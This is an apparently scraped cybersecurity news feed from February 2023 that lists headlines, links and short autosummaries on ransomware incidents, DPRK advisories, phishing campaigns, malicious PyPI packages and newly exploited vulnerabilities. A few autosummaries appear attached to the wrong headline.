Autosummary: DarkBit’s Twitter account with #HackForGood tag and tweets criticising layoffs. While attacking Israel for being an "aparheid regime," DarkBit attackers want to make them pay for "war crimes against humanity" and "firing high-skilled experts." "A kindly advice to the hight-tech companies: From now on, be more careful when you decide to fire your employees, specially the geek ones [sic]," DarkBit said in a subsequent tweet. "


                Hacktivists hacked Iranian State TV during President’s speech on Revolution Day

                government
                2023-02-13 https://securityaffairs.com/142172/hacktivism/iranian-state-tv-hacked.html

                The Ali’s Justice (Edalat-e Ali) hacker group broke into the State TV broadcast during the President’s speech on Revolution Day. A collective of hackers that calls itself Ali’s Justice (Edalat-e Ali) disrupted the transmission of an Iranian State TV and radio station and aired the slogan “Death to Khamenei” asking Iranians to withdraw their money […]

                The post Hacktivists hacked Iranian State TV during President’s speech on Revolution Day appeared first on Security Affairs.

                "

Autosummary: ⚠️ Confirmed: Real-time network data show a near-total disruption to internet connectivity in #Sanandaj, the capital of Kurdistan Province in west #Iran; the incident comes amid widening protests over the death of #MahsaAmini after her arrest by morality police 📉 pic.twitter.com/wZVHJjgpiR — NetBlocks (@netblocks) September 19, 2022 "


                Pepsi Bottling Ventures suffers data breach after malware attack

                financial exploits
                2023-02-13 https://www.bleepingcomputer.com/news/security/pepsi-bottling-ventures-suffers-data-breach-after-malware-attack/
                Pepsi Bottling Ventures LLC suffered a data breach caused by a network intrusion that resulted in the installation of information-stealing malware and the extraction of data from its IT systems. [...] "

                Autosummary: "


                Ransomware hits Technion university to protest tech layoffs and Israel

                exploits
                2023-02-13 https://www.bleepingcomputer.com/news/security/ransomware-hits-technion-university-to-protest-tech-layoffs-and-israel/
A new ransomware group going by the name "DarkBit" has hit Technion - Israel Institute of Technology, one of Israel’s leading research universities. The ransom note posted by DarkBit is littered with messaging protesting tech layoffs and promoting anti-Israel rhetoric, as well as the group demanding a $1.7 million payment. [...] "

Autosummary: DarkBit’s Twitter account with #HackForGood tag and tweets criticising layoffs. While attacking Israel for being an "aparheid regime," DarkBit attackers want to make them pay for "war crimes against humanity" and "firing high-skilled experts." "A kindly advice to the hight-tech companies: From now on, be more careful when you decide to fire your employees, specially the geek ones [sic]," DarkBit said in a subsequent tweet. "


                DHL, MetaMask phishing emails target Namecheap customers

                financial
                2023-02-13 https://www.helpnetsecurity.com/2023/02/13/dhl-metamask-phishing-namecheap/

A surge of phishing emails impersonating DHL and MetaMask started hitting the inboxes of Namecheap customers last week, attempting to trick recipients into sharing personal information or their crypto wallet’s secret recovery phrase. Attention @Namecheap users: be wary of suspicious emails claiming to be from DHL. #phishing scams are rampant and it’s crucial to keep your personal information safe. Time for #Namecheap to enhance their security measures. #cybersecurity #emailscams pic.twitter.com/kTPvY90b7d — Gbenga (@lemogbenga) February … More

                The post DHL, MetaMask phishing emails target Namecheap customers appeared first on Help Net Security.

                "

Autosummary: MetaMask has issued an alert today about the phishing emails, and DHL generally warns users that: official DHL communication is always sent from @dhl.com, @dpdhl.com, @dhl.de, @dhl.fr or another country domain after @dhl; the company never uses @gmail, @yahoo or other free email services to send emails; they never link to a website other than their own (starting with, for example, https://dhl.com/, https://dpdhl.com/, or a country/campaign website). It’s impossible to gauge how many users fell for the scam. "


                Honeypot-Factory: The Use of Deception in ICS/OT Environments

                industry
                2023-02-13 https://thehackernews.com/2023/02/honeypot-factory-use-of-deception-in.html
There have been a number of reports of attacks on industrial control systems (ICS) in the past few years. Looking a bit closer, most of the attacks seem to have spilt over from traditional IT. That’s to be expected, as production systems are commonly connected to ordinary corporate networks at this point. Though our data does not indicate at this point that a lot of threat actors specifically "

Autosummary: For instance, ICS honeypots like Conpot, XPOT, and CryPLH can simulate the Modbus, S7, IEC-104, DNP3 and other protocols. Conpot is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. With the development of cybersecurity technology, deception has been applied in various circumstances like the web, databases, mobile apps, and IoT. Deception technology has been embodied in some ICS honeypot applications in the OT field. With some deception applications, for instance honeypots, the operating environment and configuration can be simulated, thus luring the attacker to penetrate the fake target. "


Chinese Tonto Team Hackers’ Second Attempt to Target Cybersecurity Firm Group-IB Fails

                ciber
                2023-02-13 https://thehackernews.com/2023/02/chinese-tonto-team-hackers-second.html
The advanced persistent threat (APT) actor known as Tonto Team carried out an unsuccessful attack on cybersecurity company Group-IB in June 2022. The Singapore-headquartered firm said that it detected and blocked malicious phishing emails originating from the group targeting its employees. It’s also the second attack aimed at Group-IB, the first of which took place in March 2021. Tonto Team, "

                Autosummary: Tonto Team, also called Bronze Huntley, Cactus Pete, Earth Akhlut, Karma Panda, and UAC-0018, is a suspected Chinese hacking group that has been linked to attacks targeting a wide range of organizations in Asia and Eastern Europe. "


                FTC: $1.3 billion lost by 70,000 Americans to romance scams last year

                financial
                2023-02-13 https://www.bleepingcomputer.com/news/security/ftc-13-billion-lost-by-70-000-americans-to-romance-scams-last-year/
                The U.S. Federal Trade Commission (FTC) says Americans once again reported record losses of $1.3 billion to romance scams in 2022, with median losses of $4,400. [...] "

                Autosummary: Based on filed reports, the most popular platforms among fraudsters to contact potential victims are Facebook (28%) and Instagram (29%), while the top payment methods are cryptocurrency (34%) and bank wire transfers/payments (27%). "


                Vulnerabilities open Korenix JetWave industrial networking devices to attack

                industry
                2023-02-13 https://www.helpnetsecurity.com/2023/02/13/korenix-jetwave-industrial-vulnerabilities/

                Three vulnerabilities found in a variety of Korenix JetWave industrial access points and LTE cellular gateways may allow attackers to either disrupt their operation or to use them as a foothold for further attacks, CyberDanube researchers have found. “If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker,” the researchers noted. … More

                The post Vulnerabilities open Korenix JetWave industrial networking devices to attack appeared first on Help Net Security.

                "

                Autosummary: "


                Apple fixes new WebKit zero-day exploited to hack iPhones, Macs

                exploits
                2023-02-13 https://www.bleepingcomputer.com/news/security/apple-fixes-new-webkit-zero-day-exploited-to-hack-iphones-macs/
                Apple has released emergency security updates to address a new zero-day vulnerability used in attacks to hack iPhones, iPads, and Macs. [...] "

                Autosummary: "


                Spain, U.S. dismantle phishing gang that stole $5 million in a year

                financial
                2023-02-13 https://www.bleepingcomputer.com/news/security/spain-us-dismantle-phishing-gang-that-stole-5-million-in-a-year/
Spain’s National Police and the U.S. Secret Service have dismantled a Madrid-based international cybercrime ring comprised of nine members who stole over €5,000,000 from individuals and North American companies. [...] "

                Autosummary: The organization maintained over a hundred bank accounts in various Spanish banks, using them to deposit their criminal proceeds, withdraw cash from ATMs, send it to international accounts, or convert it to cryptocurrency. "


                French law to report cyberincidents within 3 days to become effective soon

                ciber
                2023-02-13 https://www.malwarebytes.com/blog/news/2023/02/french-law-to-report-cyberincidents-within-3-days-to-become-effective-soon

                Categories: News

                Tags: France

                Tags: law

                Tags: 72 hours

                Tags: cyberincident

                Tags: insurance

                A French law has been announced that requires victims of a cyberincident to report within 72 hours after discovery. We have heard similar proposals that may come through

                (Read more...)

                The post French law to report cyberincidents within 3 days to become effective soon appeared first on Malwarebytes Labs.

                "

Autosummary: Cybercrime costs include damage and destruction of data, stolen money, lost productivity, theft of intellectual property, theft of personal and financial data, embezzlement, fraud, post-attack disruption to the normal course of business, forensic investigation, restoration and deletion of hacked data and systems, and reputational harm. As Mark continued to explain: “Failure to report can cause serious problems: In 2017, one of the early "big game" ransomware gangs, SamSam, was widely reported to be targeting government and healthcare institutions, because it seemed to attack them much more often.” On January 24, 2023 France passed a law (Article L12-10-1 of the Insurance Code) under which victims of cybercrime are required to report the incident within 72 hours after discovery if they want to be eligible for compensation by their insurance for losses and damages caused by the attack. "


CISA issues alert with South Korean government about DPRK’s ransomware antics

                exploits government ransomware industry
                2023-02-13 https://www.malwarebytes.com/blog/news/2023/02/cisa-issues-alert-with-south-korean-government-about-dprks-ransomware-antics

                Categories: News

                Categories: Ransomware

                Tags: CISA

                Tags: ransomware

                Tags: Democratic People’s Republic of Korea

                Tags: DPRK

                Tags: North Korea

                Tags: WannaCry

                Tags: EternalBlue

                Tags: Lazarus Group

                Tags: APT

                Tags: Magniber

                Tags: Magnitude exploit kit

                Tags: exploit kit

                Tags: EK

                Tags: Andariel

                Tags: Silent Chollima

                Tags: Stonefly

                Tags: Maui

                Tags: H0lyGh0st

                Tags: PLUTONIUM

                Tags: Conti

                The tactics of North Korean-sponsored ransomware cyberattacks against the healthcare sector and other vital infrastructure are highlighted in the latest #StopRansomware alert.

                (Read more...)

The post CISA issues alert with South Korean government about DPRK’s ransomware antics appeared first on Malwarebytes Labs.

                "

Autosummary: DPRK ransomware has significantly altered the face of ransomware, tuning it up from a simple locker and then making it more disruptive, lucrative, and, in some cases, destructive. H0lyGh0st, like other current ransomware gangs, favors double-extortion tactics, maintains a leak site, and targets small and medium-sized enterprises (SMEs). Once it arrives on target networks, it encrypts servers responsible for record-keeping, diagnosing, imaging services, and others. "North Korea’s cyber program poses a growing espionage, theft, and attack threat," the Annual Threat Assessment report in 2021 said. "


                Malwarebytes recognized as endpoint security leader by G2

                exploits
                2023-02-13 https://www.malwarebytes.com/blog/business/2023/02/malwarebytes-recognized-as-endpoint-security-leader-by-g2

                Categories: Business

                G2 has released their Winter 2023 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories based on customer reviews.

                (Read more...)

                The post Malwarebytes recognized as endpoint security leader by G2 appeared first on Malwarebytes Labs.

                "

Autosummary: Summary Report: Malwarebytes has ranked #1 for 5 reports overall across all vendors and market segments (Grid main report, Results Index, Relationship Index, Implementation Index, Usability Index). Malwarebytes has ranked #1 for 5 Mid-Market reports (Grid main report, Results Index, Relationship Index, Implementation Index, Usability Index). Malwarebytes has ranked #1 for 1 Small Business report (Grid main report, fastest implementation). Security teams need a solution that is quick to deploy, easy to set up, and uncomplicated. "


                Confident cybersecurity means fewer headaches for SMBs

                ciber
                2023-02-13 https://www.welivesecurity.com/2023/02/13/confident-cybersecurity-fewer-headaches-smbs/

                Small and medium-sized businesses have good reason to be concerned about the loss of data and financial impacts

                The post Confident cybersecurity means fewer headaches for SMBs appeared first on WeLiveSecurity

                "

                Autosummary: “Keeping up,” for some, means how to, practically speaking, face concerns about malware, web-based attacks, ransomware, third-party security issues, and critical or high-severity software vulnerabilities. With less than a third of respondents VERY confident in any area of cybersecurity, including IT team cybersecurity knowledge (32%), the speed with which they can identify, isolate and respond to a threat (30%), access to third-party experts (29%), their reported sentiments beg the question of which businesses are confident enough to keep security in-house. "


                Devs targeted by W4SP Stealer malware in malicious PyPi packages

                exploits
                2023-02-12 https://www.bleepingcomputer.com/news/security/devs-targeted-by-w4sp-stealer-malware-in-malicious-pypi-packages/
                Five malicious packages were found on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers. [...] "

Autosummary: List of sites targeted by the malware (Fortinet). Some of the targeted sites include: Coinbase.com, Gmail.com, YouTube.com, Instagram.com, PayPal.com, Telegram.com, Hotmail.com, Outlook.com, Aliexpress.com, ExpressVPN.com, eBay.com, Playstation.com, xbox.com, Netflix.com, Uber.com. After gathering all data it finds on the compromised machine, the malware uses its ‘upload’ function to upload the stolen data using a Discord webhook, which posts it to the threat actor’s server. "


                Russian Government evaluates the immunity to hackers acting in the interests of Russia

                government rusia-ucrania
                2023-02-12 https://securityaffairs.com/142139/cyber-warfare-2/russian-government-crooks-immunity.html

The Russian Government has proposed a form of immunity for hackers who operate in the interests of Moscow. Russian media reported that Alexander Khinshtein, the head of the Duma committee on information policy, announced that the Russian government is considering exempting from punishment hackers acting in the interests of Moscow. “The question of […]

                The post Russian Government evaluates the immunity to hackers acting in the interests of Russia appeared first on Security Affairs.

                "

                Autosummary: "


NameCheap’s email hacked to send Metamask, DHL phishing emails

                financial
                2023-02-12 https://www.bleepingcomputer.com/news/security/namecheaps-email-hacked-to-send-metamask-dhl-phishing-emails/
Domain registrar Namecheap had their email account breached Sunday night, causing a flood of MetaMask and DHL phishing emails that attempted to steal recipients’ personal information and cryptocurrency wallets. [...] "

Autosummary: MetaMask phishing email from Namecheap (Source: BleepingComputer.com). "We are writing to inform you that in order to continue using our wallet service, it is important to obtain KYC (Know Your Customer) verification." MetaMask phishing page (Source: BleepingComputer). Once a user provides either the recovery phrase or private key, the threat actors can use them to import the wallet to their own devices and steal all the funds and assets. "


                The Israel Institute of Technology Technion suffered a ransomware attack

                exploits ransomware
                2023-02-12 https://securityaffairs.com/142160/hacking/israeli-technion-suffered-ransomware-attack.html

                The Technion – Israel Institute of Technology was breached on Sunday by a new anti-Israel threat actor calling itself DarkBit. Technion – Israel Institute of Technology is Israel’s top technology research university and a leading center for cyber security education. A new anti-Israel threat actor calling itself DarkBit is claiming responsibility for the ransomware attack that breached the […]

                The post The Israel Institute of Technology Technion suffered a ransomware attack appeared first on Security Affairs.

                "

Autosummary: "


                CISA Warns of Active Attacks Exploiting Fortra MFT, TerraMaster NAS, and Intel Driver Flaws

                exploits
                2023-02-11 https://thehackernews.com/2023/02/cisa-warns-of-active-attacks-exploiting.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active abuse in the wild. Included among the three is CVE-2022-24990, a bug affecting TerraMaster network-attached storage (TNAS) devices that could lead to unauthenticated remote code execution with the highest privileges. Details "

                Autosummary: The development underscores the growing adoption of the technique by multiple threat actors, namely BlackByte, Earth Longzhi, Lazarus Group, and OldGremlin, to power their intrusions with elevated privileges. "


                CISA adds Fortra MFT, TerraMaster NAS, Intel driver Flaws, to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-02-11 https://securityaffairs.com/142115/hacking/mft-terramaster-intel-driver-flaws-to-its-known-exploited-vulnerabilities-catalog.html

                US CISA added actively exploited flaws in Fortra MFT, Intel driver, and TerraMaster NAS to its Known Exploited Vulnerabilities Catalog. US CISA added actively exploited flaws in Fortra MFT, Intel driver, and TerraMaster NAS, respectively tracked as CVE-2023-0669, CVE-2015-2291, and CVE-2022-24990, to its Known Exploited Vulnerabilities Catalog. The CVE-2015-2291 flaw (CVSS v3 score 7.8) is a […]

                The post CISA adds Fortra MFT, TerraMaster NAS, Intel driver Flaws, to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                New ESXiArgs Ransomware Variant Emerges After CISA Releases Decryptor Tool

                exploits ransomware
                2023-02-11 https://thehackernews.com/2023/02/new-esxiargs-ransomware-variant-emerges.html
                After the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a decryptor for affected victims to recover from ESXiArgs ransomware attacks, the threat actors have bounced back with an updated version that encrypts more data. The emergence of the new variant was reported by a system administrator on an online forum, where another participant stated that files larger than 128MB "

                Autosummary: A majority of the infections are located in France, the U.S., Germany, Canada, the U.K., the Netherlands, Finland, Turkey, Poland, and Taiwan. "


                Clop ransomware claims the hack of 130 orgs using GoAnywhere MFT flaw

                exploits ransomware
                2023-02-11 https://securityaffairs.com/142130/cyber-crime/clop-ransomware-goanywhere-mft.html

                The Clop ransomware group claims to have breached over 130 organizations exploiting the GoAnywhere MFT zero-day. The Clop ransomware group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669) in Fortra’s GoAnywhere MFT secure file transfer tool, BleepingComputer reported. Fortra immediately addressed the flaw with the release of […]

                The post Clop ransomware claims the hack of 130 orgs using GoAnywhere MFT flaw appeared first on Security Affairs.

                "

Autosummary: "


                Thousands of pregnant Russian women fly to Argentina

                latam rusia-ucrania
                2023-02-11 https://www.bbc.co.uk/news/world-64610954?at_medium=RSS&at_campaign=KARANGA
                The women are trying to ensure their children obtain Argentinian passports, officials say. "

                Autosummary: "


Narcocorridos: Mexico’s bloody drug ballads have American ears tingling

                latam
                2023-02-11 https://www.bbc.co.uk/news/world-us-canada-64337404?at_medium=RSS&at_campaign=KARANGA
                A genre likened to gangster rap revels in the cartel wars and has listeners divided on its merits. "

                Autosummary: "


                Socure joins FIDO Alliance to improve identity verification industry standards

                industry
                2023-02-10 https://www.helpnetsecurity.com/2023/02/10/socure-fido-alliance/

                Socure has joined the FIDO (Fast IDentity Online) Alliance to advance identity verification standards that make it easy to verify identity online and protect against identity fraud across industries. Socure’s mission is to verify 100% of good identities in real-time and completely eliminate identity fraud for every applicant on the internet. Its graph-defined platform combines advanced machine learning and artificial intelligence with all elements of a consumer’s identity to deliver the most accurate and robust … More

                The post Socure joins FIDO Alliance to improve identity verification industry standards appeared first on Help Net Security.

                "

                Autosummary: "


                Android mobile devices from top vendors in China have pre-installed malware

                exploits
                2023-02-10 https://securityaffairs.com/141989/malware/android-mobile-devices-china-malware.html

                Researchers reported that the top-of-the-line Android mobile devices sold in China are shipped with malware. China is currently the country with the largest number of Android mobile devices, but a recent study conducted by researchers from the University of Edinburgh and the Trinity College of Dublin revealed that top-of-the-line Android devices sold in the country […]

                The post Android mobile devices from top vendors in China have pre-installed malware appeared first on Security Affairs.

                "

Autosummary: "


                3 Overlooked Cybersecurity Breaches

                ciber
                2023-02-10 https://thehackernews.com/2023/02/3-overlooked-cybersecurity-breaches.html
                Here are three of the worst breaches, attacker tactics and techniques of 2022, and the security controls that can provide effective, enterprise security protection for them. #1: 2 RaaS Attacks in 13 Months Ransomware as a service is a type of attack in which the ransomware software and infrastructure are leased out to the attackers. These ransomware services can be purchased on the dark web from "

Autosummary: Visibility relies on three pillars: actionable information, which can be used to mitigate attacks; reliable information, which minimizes the number of false positives; and timely information, to ensure mitigation happens before the attack has an impact. Once an organization has complete visibility into the activity on its network it can contextualize the data, decide whether the activity witnessed should be allowed, denied, monitored, restricted (or any other action) and then have the ability to enforce this decision. Here’s what to watch out for in the coming months. According to ongoing security research conducted by the Cato Networks Security Team, they have identified two additional vulnerabilities and exploit attempts that they recommend including in your upcoming security plans: 1. Log4j: while Log4j made its debut as early as December of 2021, the noise it’s making hasn’t died down. "Breaches are never just a phishing problem, or a credentials problem, or a vulnerable system problem - they are always a combination of multiple compromises performed by the threat actor," said Etay Maor, Sr. Director of Security Strategy at Cato Networks. "The underlying technologies to implement a multiple choke point approach are full network visibility via a cloud-native backbone, and a single pass security stack that’s based on ZTNA," said Etay Maor, Sr. Director of Security Strategy at Cato Networks. "


                U.K. and U.S. Sanction 7 Russians for TrickBot, Ryuk, and Conti Ransomware Attacks

                exploits ransomware rusia-ucrania
                2023-02-10 https://thehackernews.com/2023/02/uk-and-us-sanction-7-russians-for.html
                In a first-of-its-kind coordinated action, the U.K. and U.S. governments on Thursday levied sanctions against seven Russian nationals for their affiliation to the TrickBot, Ryuk, and Conti cybercrime operation. The individuals designated under sanctions are Vitaly Kovalev (aka Alex Konor, Bentley, or Bergen), Maksim Mikhailov (aka Baget), Valentin Karyagin (aka Globus), Mikhail Iskritskiy (aka "

                Autosummary: The individuals designated under sanctions are Vitaly Kovalev (aka Alex Konor, Bentley, or Bergen), Maksim Mikhailov (aka Baget), Valentin Karyagin (aka Globus), Mikhail Iskritskiy (aka Tropa), Dmitry Pleshevskiy (aka Iseldor), Ivan Vakhromeyev (aka Mushroom), and Valery Sedletski (aka Strix). "


                Hogwarts Legacy game comes out as online debate continues

                ransomware
                2023-02-10 https://www.bbc.co.uk/news/entertainment-arts-64572328?at_medium=RSS&at_campaign=KARANGA
                There have been calls for a boycott, but the big-budget game is expected to be a big seller. "

                Autosummary: "


                North Korean ransomware attacks on healthcare fund govt operations

                exploits ransomware
                2023-02-10 https://www.bleepingcomputer.com/news/security/north-korean-ransomware-attacks-on-healthcare-fund-govt-operations/
A new cybersecurity advisory from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) describes recently observed tactics, techniques, and procedures (TTPs) used in North Korean ransomware operations against public health and other critical infrastructure sectors. [...] "

Autosummary: [1, 2] The U.S. agency notes that the actors "have also been observed using or possessing publicly available tools for encryption:" BitLocker (abuse of a legitimate tool), Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, YourRansom. To note, BleepingComputer is aware that more than half of these lockers are available from public sources but could not confirm this for all of them. "


                North Korea targets US, South Korean hospitals with ransomware to fund further cyber operations

                exploits ransomware
                2023-02-10 https://www.helpnetsecurity.com/2023/02/10/north-korea-targets-us-south-korean-hospitals-with-ransomware-to-fund-further-cyber-operations/

                US and South Korean agencies have issued a joint cybersecurity advisory describing the tactics, techniques and procedures used by North Korean hackers to deploy “state-sponsored” ransomware on hospitals and other organizations that can be considered part of the countries’ critical infrastructure. “The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department … More

                The post North Korea targets US, South Korean hospitals with ransomware to fund further cyber operations appeared first on Help Net Security.


                Autosummary: They “purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments,” and “use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from the Democratic People’s Republic of Korea.”


                North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations

                exploits ransomware
                2023-02-10 https://thehackernews.com/2023/02/north-korean-hackers-targeting.html
                State-backed hackers from North Korea are conducting ransomware attacks against healthcare and critical infrastructure facilities to fund illicit activities, U.S. and South Korean cybersecurity and intelligence agencies warned in a joint advisory. The attacks, which demand cryptocurrency ransoms in exchange for recovering access to encrypted files, are designed to support North Korea's



                New TA886 group targets companies with custom Screenshotter malware

                exploits
                2023-02-10 https://securityaffairs.com/142077/cyber-crime/ta886-group-screenshotter-malware.html

                The TA886 hacking group targets organizations in the United States and Germany with new spyware tracked as Screenshotter. A recently discovered threat actor, tracked as TA886 by security firm Proofpoint, is targeting organizations in the United States and Germany with new malware dubbed Screenshotter. The experts first spotted the attacks attributed to this threat actor […]

                The post New TA886 group targets companies with custom Screenshotter malware appeared first on Security Affairs.


                Autosummary: It can steal crypto wallets, Steam accounts, passwords from browsers, FTP clients, chat clients (e.g. Telegram, Discord), email clients, VPN configurations, cookies, grab files, and more.


                California medical group data breach impacts 3.3 million patients

                financial
                2023-02-10 https://www.bleepingcomputer.com/news/security/california-medical-group-data-breach-impacts-33-million-patients/
                Multiple medical groups in the Heritage Provider Network in California have suffered a ransomware attack, exposing sensitive patient information to cybercriminals. [...]



                Microsoft says Intel driver bug crashes apps on Windows PCs

                exploits
                2023-02-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-says-intel-driver-bug-crashes-apps-on-windows-pcs/
                Microsoft says apps using DirectX are crashing on Windows systems with outdated Intel drivers after installing November 2022 cumulative updates. [...]



                Dallas Central Appraisal District paid $170,000 to ransomware attackers

                exploits ransomware
                2023-02-10 https://www.bitdefender.com/blog/hotforsecurity/dallas-central-appraisal-district-paid-170-000-to-ransomware-attackers/
                A Dallas state agency has admitted to paying $170,000 to hackers after it suffered an attack from the Royal ransomware group. Read more in my article on the Hot for Security blog.

                Autosummary: As we reported late last year, the Royal ransomware group - which unusually does not follow the Ransomware-as-a-Service model and rejects affiliates - has launched numerous attacks, including against healthcare organisations and telecoms firm Intrado.


                The Week in Ransomware - February 10th 2023 - Clop's Back

                exploits ransomware
                2023-02-10 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2023-clops-back/
                From ongoing attacks targeting ESXi servers to sanctions on Conti/TrickBot members, it has been quite a busy week regarding ransomware. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @malwrhunterteam, @billtoulas, @demonslay335, @struppigel, @PolarToffee, @fwosar, @BleepinComputer, @Ionut_Ilascu, @serghei, @Seifreed, @jfslowik, @CISAgov, @LabsSentinel, @BushidoToken, @ASEC_Analysis, @pcrisk, @ValeryMarchive, and @BrettCallow. February 8th 2023: New ESXiArgs ransomware attacks are now encrypting more extensive amounts of data, making it much harder, if not impossible, to recover encrypted VMware ESXi virtual machines.


                City of Oakland systems offline after ransomware attack

                exploits government ransomware
                2023-02-10 https://www.bleepingcomputer.com/news/security/city-of-oakland-systems-offline-after-ransomware-attack/
                The City of Oakland was hit by a ransomware attack on Wednesday night that forced it to take all systems offline until the network is secured and affected services are brought back online. [...]

                Autosummary: As Emsisoft shared in January, ransomware attacks impacted more than 200 larger organizations in the U.S. public sector in 2022 across government, educational, and healthcare verticals.


                A10 Networks confirms data breach after Play ransomware attack

                financial exploits ransomware
                2023-02-10 https://www.bleepingcomputer.com/news/security/a10-networks-confirms-data-breach-after-play-ransomware-attack/
                The California-based networking hardware manufacturer "A10 Networks" has confirmed to BleepingComputer that the Play ransomware gang briefly gained access to its IT infrastructure and compromised data. [...]



                Clop ransomware claims it breached 130 orgs using GoAnywhere zero-day

                exploits ransomware
                2023-02-10 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-it-breached-130-orgs-using-goanywhere-zero-day/
                The Clop ransomware gang claims to be behind recent attacks that exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool, saying they stole data from over 130 organizations. [...]

                Autosummary: Organizations that had their servers hacked by Clop include, among others, energy giant Shell, supermarket giant Kroger, cybersecurity firm Qualys, and multiple universities worldwide (e.g., Stanford Medicine, University of Colorado, University of Miami, University of Maryland Baltimore (UMB), and the University of California).


                Ransomware attack hit the City of Oakland

                exploits government
                2023-02-10 https://securityaffairs.com/142110/cyber-crime/city-of-oakland-ransomware-attack.html

                A ransomware attack hit the City of Oakland this week, forcing it to take all systems offline in response to the incident. The City of Oakland disclosed a ransomware attack; the security breach began on Wednesday night. In an abundance of caution, the City of Oakland has taken impacted systems offline, while they work to […]

                The post Ransomware attack hit the City of Oakland appeared first on Security Affairs.




                DPRK fund malicious cyber activities with ransomware attacks on critical Infrastructure

                exploits ransomware
                2023-02-10 https://securityaffairs.com/142090/breaking-news/north-korea-hackers-ransomware.html

                North Korea-linked APT groups conduct ransomware attacks against healthcare and critical infrastructure facilities to fund their activities. Ransomware attacks on critical infrastructure conducted by North Korea-linked hacker groups are used by the government of Pyongyang to fund its malicious cyber operations, U.S. and South Korean agencies warn. US CISA published a Cybersecurity Advisory (CSA) to […]

                The post DPRK fund malicious cyber activities with ransomware attacks on critical Infrastructure appeared first on Security Affairs.


                Autosummary: Attackers used privately developed ransomware, such as Maui and H0lyGh0st, along with other ransomware families, including BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486].


                ChatGPT integration for Logpoint SOAR allows users to explore its potential in cybersecurity

                ciber
                2023-02-09 https://www.helpnetsecurity.com/2023/02/09/logpoint-chatgpt-integration/

                Logpoint has released a ChatGPT integration for Logpoint SOAR in a lab setting. It allows users to experiment with the potential of the AI-driven chatbot and discover how the technology could apply in cybersecurity operations. “We’re excited to enable our customers to explore the possibilities of using technologies such as ChatGPT to reduce part of their workload,” says Edy Almer, Logpoint Product Manager for Threat Detection and Incident Response. “Staying up to date with …

                The post ChatGPT integration for Logpoint SOAR allows users to explore its potential in cybersecurity appeared first on Help Net Security.




                Opscura raises $9.4 million to address industrial cybersecurity challenges

                industry ciber
                2023-02-09 https://www.helpnetsecurity.com/2023/02/09/opscura-funding/

                Opscura has received $9.4M in Series A funding as it scales to engage further U.S. partners and customers seeking to protect and connect their critical operations. Founded in Spain as Enigmedia, the new global entity Opscura is also launching a new brand, global management team, and product upgrades in addition to the capital infusion led by Anzu Partners, with investments from Dreamit and Mundi Ventures. Opscura’s technology adds a layer to the industrial cybersecurity ecosystem …

                The post Opscura raises $9.4 million to address industrial cybersecurity challenges appeared first on Help Net Security.


                Autosummary: Customers across various industries, including renewable energy, transportation, manufacturing, government, and chemical, also rely on Opscura to solve industrial cybersecurity, compliance, and digital transformation challenges.


                New ESXiArgs ransomware version prevents VMware ESXi recovery

                exploits ransomware
                2023-02-09 https://www.bleepingcomputer.com/news/security/new-esxiargs-ransomware-version-prevents-vmware-esxi-recovery/
                New ESXiArgs ransomware attacks are now encrypting more extensive amounts of data, making it much harder, if not impossible, to recover encrypted VMware ESXi virtual machines. [...]

                Autosummary: For even larger files, like a 450GB file, the amount of skipped data rises dramatically, with the size_step becoming "4607," now alternating between encrypting 1MB and skipping 4.49 GB of data.


                Inadequate cybersecurity investments leave rail industry at risk

                industry ciber
                2023-02-09 https://www.helpnetsecurity.com/2023/02/09/rail-industry-cybersecurity-spending/

                The popular notion might view the rail industry as a laggard compared to auto or high-tech manufacturing when embracing Industry 4.0. Yet railways are increasingly dependent on sophisticated connected systems to enhance efficiency and customer satisfaction. Rail industry needs to work closely with cybersecurity vendors: With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding …

                The post Inadequate cybersecurity investments leave rail industry at risk appeared first on Help Net Security.


                Autosummary: Rail industry needs to work closely with cybersecurity vendors: With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding to become an integral component of safety, providing new market opportunities in the rail, freight, and transit sector.


                Cybercriminals exploit volatile job market for targeted email attacks

                exploits ciber
                2023-02-09 https://www.helpnetsecurity.com/2023/02/09/cybercriminals-exploit-job-market-targeted-email-attacks/

                Between July and December 2022, the median open rate for text-based business email compromise (BEC) attacks was nearly 28%, according to Abnormal Security. Business email and supply chain compromise as attack strategies: Additionally, of the malicious emails that were read, an average of 15% were replied to. And while less than one percent of recipients engaged with more than one attack, 36% of replies were initiated by employees who had previously engaged with an earlier attack. When …

                The post Cybercriminals exploit volatile job market for targeted email attacks appeared first on Help Net Security.


                Autosummary: Employees: Greatest asset or biggest cybersecurity liability: Additional findings from the report include: Only 2.1% of known attacks are reported to the security team by employees, and 84% of employee reports to phishing mailboxes are either safe emails or graymail.


                PayPal and Twitter abused in Turkey relief donation scams
